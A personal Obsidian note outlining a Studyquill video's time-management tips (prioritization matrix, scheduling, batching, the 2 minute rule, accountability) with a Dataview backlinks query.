--- started: 2022-01-08 finished: rating: --- Status: #📥/🟧 Tags: [[Time Management]] - [[Studyquill Case Study]] Links: [[+ Videos]] ___ # + Studyquil the definitive TIME MANAGEMENT GUIDE for busy but lazy people > [URL]() Creator:: me ! ## Notes ### Content #### how to prioritize - janice's matrix - [![Image from Gyazo](https://i.gyazo.com/062df13c2331501ecbb3a89a0d6c31d2.png)](https://gyazo.com/062df13c2331501ecbb3a89a0d6c31d2) - interim deadlines #### planning - scheduling tasks - to do list - estimate time length - schedule in day - batch - include free time - tools #### execute - external accountability - 2 minute rule - only 2 minutes - take breaks ### Content style - describe principle - how do you do it? - why does it work? - ex) 2 minute rule helps with x - basically, you y - i use this for z - explain via example - show applications ## Thoughts/Questions - ___ # Backlinks ```dataview list from [[+ Studyquil the definitive TIME MANAGEMENT GUIDE for busy but lazy people]] ``` ___ Created:: 2022-01-08 19:01
20.192308
134
0.7
eng_Latn
0.887094